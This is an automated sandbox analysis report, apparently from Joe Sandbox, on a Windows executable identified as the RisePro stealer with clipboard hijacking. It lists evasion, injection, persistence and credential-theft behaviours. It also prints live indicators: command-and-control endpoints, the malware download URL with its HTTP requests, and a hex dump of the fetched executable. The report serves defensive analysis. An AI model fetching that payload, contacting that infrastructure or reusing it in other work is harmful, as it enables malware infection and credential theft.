Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1445936
MD5: 3d5808948d8fa538b14ddc5d1861202b
SHA1: 465557a1e5384105df4f388e960f2c8469bf7b98
SHA256: a22db49ce797ce6ac5d91a4791d9954f4c31397b01d362fb0d24ffb7e16cd8d5
Tags: exe
Infos:

Detection

Clipboard Hijacker, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected Clipboard Hijacker
Yara detected RisePro Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to implement multi-threaded time evasion
Contains functionality to inject threads in other processes
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\l2[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\l2[1].exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe ReversingLabs: Detection: 65%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC6B00 CryptUnprotectData,CryptUnprotectData,LocalFree,LocalFree, 3_2_02EC6B00
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb source: file.exe, 00000000.00000003.2239999857.0000019161670000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264369355.000000C000728000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C0017B6000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C0017F0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4555474593.000000000312F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: file.exe, 00000000.00000003.2239999857.0000019161670000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264369355.000000C000728000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C0017B6000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C0017F0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4555474593.000000000312F000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC6000 CreateDirectoryA,FindFirstFileA,FindNextFileA,GetLastError,FindClose, 3_2_02EC6000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE6770 CreateDirectoryA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 3_2_02EE6770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E31F9C FindClose,FindFirstFileExW,GetLastError, 3_2_02E31F9C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E93F40 SHGetFolderPathA,FindFirstFileA,FindNextFileA,FindClose,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CopyFileA, 3_2_02E93F40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E32022 GetLastError,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 3_2_02E32022
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E938D0 FindFirstFileA,FindNextFileA,GetLastError,FindClose, 3_2_02E938D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EDFF00 CreateDirectoryA,FindFirstFileA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,GetLastError,GetLastError, 3_2_02EDFF00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E4FC2F FindFirstFileExW, 3_2_02E4FC2F

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.6:49705 -> 185.172.128.136:50500
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 185.172.128.136:50500 -> 192.168.2.6:49705
Source: Traffic Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 185.172.128.136:50500 -> 192.168.2.6:49705
Source: Traffic Snort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.6:49705 -> 185.172.128.136:50500
Source: Traffic Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.6:49705 -> 185.172.128.136:50500
Source: Traffic Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.6:49708 -> 185.172.128.82:80
Source: Traffic Snort IDS: 2049660 ET TROJAN RisePro CnC Activity (Outbound) 185.172.128.136:50500 -> 192.168.2.6:49705
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 185.172.128.136:50500 -> 192.168.2.6:49709
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49705 -> 185.172.128.136:50500
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Wed, 22 May 2024 18:06:29 GMTContent-Type: application/octet-streamContent-Length: 4563640Last-Modified: Wed, 22 May 2024 06:47:19 GMTConnection: keep-aliveETag: "664d94f7-45a2b8"Accept-Ranges: bytesData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 a9 4d d8 61 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 1d 00 18 00 00 00 5e 19 00 00 00 00 00 c8 80 77 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 7d 00 00 02 00 00 6d 1a 46 00 02 00 00 85 00 00 10 00 00 d0 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 77 00 c8 00 00 00 00 90 77 00 7c f6 05 00 00 00 00 00 00 00 00 00 00 8a 45 00 b8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 80 77 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 70 77 00 00 10 00 00 00 82 3f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 32 0c 00 00 00 80 77 00 00 0e 00 00 00 84 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 7c f6 05 00 00 90 77 00 00 f8 05 00 00 92 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 77 07 ae 80 3f 00 20 05 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 60 06 2e 19 84 3d c1 98 07 18 3f b1 8a c8 06 21 97 5a 9f 17 26 49 ef d7 89 87 a0 7f f8 9c 1a 49 31 38 ab c9 5a 21 b9 88 59 1b ae 73 bb 19 eb 5b 51 58 ea b8 cf f9 ca 61 e9 ea fc d8 84 59 59 a3 81 db 8e 29 e7 76 bc d0 d2 e2 0b 6e c0 ce 18 8d 84 c5 87 7c 29 a6 0c ed c1 5e 66 bf 07 2b e3 8a 3e 03 98 38 34 68 38 32 67 b0 86 8a 3e 2a b4 68 62 5c b0 a7 9b 45 96 28 ad 78 ba dd 89 a6 ce bc d5 40 b7 38 5f c9 39 ec 34 55 10 6d 18 ec 27 8d 73 cb c6 0f d8 05 bc 23 ff 88 ab da b9 96 30 33 fc b8 00 a9 fc 92 1d 4f c4 e7 90 5d 60 12 9b 53 32 db b8 40 23 0f c7 03 0e ab 10 fd b8 f2 6f 46 7e 9e 2a fd 52 a1 c1 51 7f d0 71 be 6f 98 79 6e fb c1 da 4f 41 40 7c 1f ec 12 e5 67 c5 d8 1f 46 b5 b1 d2 97 12 30 90 6a b0 c9 1f 1e a8 e1 11 73 2f 0b e5 48 af 0a 2b 20 30 43 da 21 be 8e ec f6 37 73 ee f1 5e 48 2c 1a 0b be 82 1d a8 20 0e ce 7b 8d f5 c5 f5 e3 da 80 c7 b4 ba 02 87 94 03 b5 02 97 44 af ba e5 e0 f5 bf 72 12 49 97 0b 2c 7c 8b 1d ae 9b bd d0 7f a8 75 84 36 ba bb 9e 15 0a be 45 3e 71 de d7 7d 7f dc d8 99 86 67 a0 c3 29 e4 8b 55 fe e5 4d 45 98 27 d7 91 6a 7d f4 1a 1a c6 e0 91 00 ee f6 37 5e 0a 8d
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 172.67.75.166 172.67.75.166
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NADYMSS-ASRU NADYMSS-ASRU
Source: Joe Sandbox View ASN Name: NADYMSS-ASRU NADYMSS-ASRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
May check the online IP address of the machine
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.175 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=8.46.123.175 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: HEAD /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 185.172.128.82Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 185.172.128.82Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.136
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC8590 recv,WSAStartup,getaddrinfo,closesocket,socket,connect,closesocket,freeaddrinfo,WSACleanup,freeaddrinfo, 3_2_02EC8590
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.175 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=8.46.123.175 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 185.172.128.82Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: db-ip.com
Source: BitLockerToGo.exe, 00000003.00000002.4563708382.00000000074C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4563546670.0000000007490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.82/server/k/l2.exe
Source: BitLockerToGo.exe, 00000003.00000003.3323243093.00000000074D5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2428053387.00000000074D4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4564079502.00000000074D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.82/server/k/l2.exe:(
Source: BitLockerToGo.exe, 00000003.00000003.2391535788.00000000079BA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2403573253.00000000079B1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2408857777.00000000079BE000.00000004.00000020.00020000.00000000.sdmp, KSExO5GhJ2KIj6jiDKtz.exe, 0000000A.00000003.2422238169.0000000002C02000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 0000000B.00000003.2430905741.000000000283B000.00000004.00000020.00020000.00000000.sdmp, EdgeMS2.exe.3.dr, oobeldr.exe.10.dr, MSIUpdaterV2.exe.3.dr, AdobeUpdaterV2.exe.3.dr, KSExO5GhJ2KIj6jiDKtz.exe.3.dr, l2[1].exe.3.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: BitLockerToGo.exe, 00000003.00000003.2391535788.00000000079BA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2403573253.00000000079B1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2408857777.00000000079BE000.00000004.00000020.00020000.00000000.sdmp, KSExO5GhJ2KIj6jiDKtz.exe, 0000000A.00000003.2422238169.0000000002C02000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 0000000B.00000003.2430905741.000000000283B000.00000004.00000020.00020000.00000000.sdmp, EdgeMS2.exe.3.dr, oobeldr.exe.10.dr, MSIUpdaterV2.exe.3.dr, AdobeUpdaterV2.exe.3.dr, KSExO5GhJ2KIj6jiDKtz.exe.3.dr, l2[1].exe.3.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: BitLockerToGo.exe, 00000003.00000002.4565512563.00000000076E0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2330090968.00000000076D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.0/g/ima:0m
Source: BitLockerToGo.exe, 00000003.00000003.2391535788.00000000079BA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2403573253.00000000079B1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2408857777.00000000079BE000.00000004.00000020.00020000.00000000.sdmp, KSExO5GhJ2KIj6jiDKtz.exe, 0000000A.00000003.2422238169.0000000002C02000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 0000000B.00000003.2430905741.000000000283B000.00000004.00000020.00020000.00000000.sdmp, EdgeMS2.exe.3.dr, oobeldr.exe.10.dr, MSIUpdaterV2.exe.3.dr, AdobeUpdaterV2.exe.3.dr, KSExO5GhJ2KIj6jiDKtz.exe.3.dr, l2[1].exe.3.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: file.exe, 00000000.00000003.2184349872.0000019161650000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264717201.000000C000A1A000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C001400000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2256735049.00000191614B0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.4555150527.0000000002E00000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 00000003.00000002.4563546670.0000000007490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/4
Source: BitLockerToGo.exe, 00000003.00000002.4563546670.0000000007490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.175
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.00000000031A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.175AS3356
Source: BitLockerToGo.exe, 00000003.00000003.3323243093.000000000749F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4563708382.000000000749F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=8.46.123.175
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 00000003.00000003.2322013517.0000000007509000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2323351160.0000000007509000.00000004.00000020.00020000.00000000.sdmp, TqjUl9qFEgEVWeb Data.3.dr, dEbuxUy_xTGYWeb Data.3.dr, _7f6olETKF02Web Data.3.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe String found in binary or memory: https://github.com/golang/protobuf/issues/1609):
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.000000000311F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.0000000003191000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: file.exe, 00000000.00000003.2184349872.0000019161650000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264717201.000000C000A1A000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266023505.000000C001400000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2256735049.00000191614B0000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4555150527.0000000002E00000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
